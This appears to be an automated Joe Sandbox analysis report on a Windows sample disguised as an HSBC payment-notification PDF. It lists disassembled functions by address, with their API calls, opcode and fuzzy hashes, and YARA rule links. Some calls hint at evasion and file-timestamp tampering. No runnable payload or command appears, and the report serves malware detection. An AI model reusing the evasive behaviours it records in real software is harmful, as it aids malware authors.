API String ID: 4104443479-1914660620
Opcode ID: 9c66a10a8673985021788653dd36bc4fd35b7771d48e8ec4f3bf100b67519411
Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
Opcode Fuzzy Hash: 9c66a10a8673985021788653dd36bc4fd35b7771d48e8ec4f3bf100b67519411
Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA

Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043EA39
GetOpenFileNameW.COMDLG32(?), ref: 0043EA83

Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770

Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0

Strings

X, xrefs: 0043EA51

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA

Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00468DAC
__fread_nolock.LIBCMT ref: 00468DC1

Strings

EA06, xrefs: 00468DF3

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764

Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F

Strings

aut, xrefs: 00469909

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9

Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86

Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00404370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A

Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00425733

Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C

__NMSG_WRITE.LIBCMT ref: 0042573A

Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308

Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D

Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C

Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00468D1B

Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B

_free.LIBCMT ref: 00468D2C
_free.LIBCMT ref: 00468D3E

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C

Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0043FC01

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: a1baa42b8be179491f8629f726f649e9c6f633d5cce95d2c5905adb20c947136
Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
Opcode Fuzzy Hash: a1baa42b8be179491f8629f726f649e9c6f633d5cce95d2c5905adb20c947136
Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A

Function 0099E8F0 Relevance: 3.3, APIs: 2, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4232957fc1029d673a5c3631617843ae3e916bdb88b2c5915c1f14d4eebd2e64
Instruction ID: 82343518c33759d7fd4b92d220e6b43748d7f7eaf085a7755ebb013dc49b21e0
Opcode Fuzzy Hash: 4232957fc1029d673a5c3631617843ae3e916bdb88b2c5915c1f14d4eebd2e64
Instruction Fuzzy Hash: A2B1D82140D3C19ADF26CA6C882577BBFA85BA6324F5C45EEF4D4872D3D2699D08C363

Function 00999594 Relevance: 3.2, APIs: 2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a14768cfdad79fc590d4ae8d345d55fad4f189ced42586c779ef793225f5224
Instruction ID: 0437997541172271bd3bdd6ed9f1eed370b49ea90871138081302da4633fa292
Opcode Fuzzy Hash: 8a14768cfdad79fc590d4ae8d345d55fad4f189ced42586c779ef793225f5224
Instruction Fuzzy Hash: D951F82050D341AFDF368F6C48186777BAD6BA7360F4C458EE4958A1F2DA368C44C363

Function 004677B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004678DB

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: a89a97fef0e2843b67cc5cdf3111cbfcb0aa97fb2c3e4a79d9bb6dd56d410798
Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
Opcode Fuzzy Hash: a89a97fef0e2843b67cc5cdf3111cbfcb0aa97fb2c3e4a79d9bb6dd56d410798
Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A

Function 00998199 Relevance: 3.1, APIs: 2, Instructions: 99COMMON

Download Yara Rule

APIs

GetSidSubAuthorityCount.ADVAPI32 ref: 00998199
CloseHandle.KERNEL32(00000000,?,?,?,?,00995563), ref: 009981EB

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AuthorityCloseCountHandle
String ID:
API String ID: 1604591301-0
Opcode ID: 8195b7941e3f0a52ec3d57d049642817641e9fe1a42e06afe3b4d960dc307c2a
Instruction ID: b2f46fcf20ddf46e07550a70a931b21367a74fea2ad320bd751bf6fdab646244
Opcode Fuzzy Hash: 8195b7941e3f0a52ec3d57d049642817641e9fe1a42e06afe3b4d960dc307c2a
Instruction Fuzzy Hash: 0E31283192C2005FCE398B6C8D1993B7B6CAA737B0F0C468AE565571F2EE25AC05C252

Function 00407A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407AAB
_memmove.LIBCMT ref: 00407B16

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0323a77de9f9f125283f9f3eac0b647bd9c1fd2c8af7472a6d701d539f1455ed
Instruction ID: 2724e85abdc1188f3097b0ceee28e317ee468c7dcaf0b9eeda237b3ec1003ef0
Opcode Fuzzy Hash: 0323a77de9f9f125283f9f3eac0b647bd9c1fd2c8af7472a6d701d539f1455ed
Instruction Fuzzy Hash: CB31C4B1B00506AFC704DF69D891E69B3A4FF48314715822AE519CB3D1EB38F911CB95

Function 0099B770 Relevance: 3.1, APIs: 2, Instructions: 91fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 0099B770
SetFilePointerEx.KERNEL32 ref: 0099BAFD

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 1e664f3c660627904bb446bcb6c6240c72c77988b80dc6e29aa19ec17d5feb74
Instruction ID: af7db529bea757f11916009e34ff5a0549d7d1645afa9b8b39467db4407cad67
Opcode Fuzzy Hash: 1e664f3c660627904bb446bcb6c6240c72c77988b80dc6e29aa19ec17d5feb74
Instruction Fuzzy Hash: 4731C26190E3804FDF329B2CBB292353FAC5BA2354F4A45CAD5818B1A2E72D0C088363

Function 0099AB2E Relevance: 3.1, APIs: 2, Instructions: 64fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,0000004C,?,00000000), ref: 0099ACDE
SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 0099AD99

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 854a613e0b16ec58e8dbd055119e40aa76fa07f759953346a93b32a6277ee26d
Instruction ID: 319bb9a41bf404b56c6a800d22d0fb5ae21b4b6285d9c06c41d3bd691449dc7e
Opcode Fuzzy Hash: 854a613e0b16ec58e8dbd055119e40aa76fa07f759953346a93b32a6277ee26d
Instruction Fuzzy Hash: 4321962050D380AFDF16972D8808B667FA5DF92315F08C449E1C44E1E2E3798944D7D7

Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00404834

Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389

Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A

Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E

Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

std::exception::exception.LIBCMT ref: 00420DEC
__CxxThrowException@8.LIBCMT ref: 00420E01

Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
